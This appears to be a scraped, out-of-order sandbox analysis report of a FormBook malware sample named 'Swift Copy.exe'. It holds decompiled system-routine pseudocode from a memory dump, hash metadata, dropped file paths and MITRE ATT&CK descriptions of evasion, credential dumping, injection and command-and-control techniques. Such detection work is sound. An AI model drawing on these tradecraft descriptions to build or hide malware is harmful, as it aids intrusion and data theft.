						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x19bb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0190B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x018f645b
0x018f6463
0x018f646d
0x018f6475
0x018f647a
0x018f647e
0x018f6480
0x018f648c
0x018f6490
0x018f6495
0x018f6498
0x018f649b
0x018f649f
0x018f64a1
0x01937c07
0x01937c09
0x01937c0c
0x00000000
0x018f64a7
0x018f64a7
0x018f64aa
0x01937bf7
0x01937c00
0x00000000
0x01937bf9
0x01937bf9
0x01937bf9
0x018f64b0
0x018f64b0
0x018f64b2
0x018f64b2
0x018f64b3
0x018f64ba
0x018f6553
0x018f655e
0x018f6566
0x018f656c
0x018f6575
0x018f657f
0x018f6585
0x018f6588
0x018f6588
0x018f64c7
0x018f64cb
0x018f64ce
0x018f64d3
0x018f64da
0x018f64e5
0x018f64ed
0x018f64f1
0x018f64f5
0x018f64f6
0x018f64fa
0x018f6502
0x018f6503
0x018f6504
0x018f6507
0x018f651a
0x018f6524
0x018f6524
0x018f6526
0x018f6526
0x018f64aa
0x018f652c
0x018f652d
0x018f652e
0x018f6539

APIs

RtlDebugPrintTimes.NTDLL ref: 018F651A

Strings

0, xrefs: 018F64E5
0, xrefs: 018F64FA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: b279c07f791bd437d92d785a179ec468e8ff5cfa5a2de0bc2a7e81a483efe31f
Instruction ID: 382ccfdc337d7b09517f02b212c3238f924c49112bfa6ea0ccbf65ed7a114dec
Opcode Fuzzy Hash: b279c07f791bd437d92d785a179ec468e8ff5cfa5a2de0bc2a7e81a483efe31f
Instruction Fuzzy Hash: C9416DB16087069FC311CF28C584A16BBE5FB89718F14466EF688DB341D731EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0195FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0195FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0190CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01955720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01955720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0195fdda
0x0195fde2
0x0195fde5
0x0195fdec
0x0195fdfa
0x0195fdff
0x0195fe0a
0x0195fe0f
0x0195fe17
0x0195fe1e
0x0195fe19
0x0195fe19
0x0195fe19
0x0195fe20
0x0195fe21
0x0195fe22
0x0195fe25
0x0195fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0195FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0195FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0195FE01

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c4973503b49fa55341c3adb98e4f05894180511722946614d9f73bb6b3d3c90d
Instruction ID: 8dd7a12a4e9c4bb340e84f662558c4ec51eae44f3293d7f3b3855be054d446c7
Opcode Fuzzy Hash: c4973503b49fa55341c3adb98e4f05894180511722946614d9f73bb6b3d3c90d
Instruction Fuzzy Hash: 83F0C232200201BFEB615A45DC42F63BF5AEB84B30F250314FA28662E1DA62B96097A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Swift Copy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift Copy.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\77824-68

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlnywwb4.hev.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1crm10v.d0k.ps1

C:\Users\user\AppData\Local\Temp\tmpE16E.tmp

C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe:Zone.Identifier

C:\Users\user\Documents\20220811\PowerShell_transcript.562258.BHPHpPz5.20220811062819.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
Swift Copy.exe

Function 049CAB82 Relevance: 48.9, Strings: 36, Instructions: 3864
COMMON

Function 049CAB90 Relevance: 48.9, Strings: 36, Instructions: 3861
COMMON

Function 02337330 Relevance: 3.5, Strings: 2, Instructions: 972
COMMON

Function 0233BFFF Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 049C02F0 Relevance: 1.7, APIs: 1, Instructions: 161
COMMON

Function 049C1F34 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 049C2A6C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 02335345 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre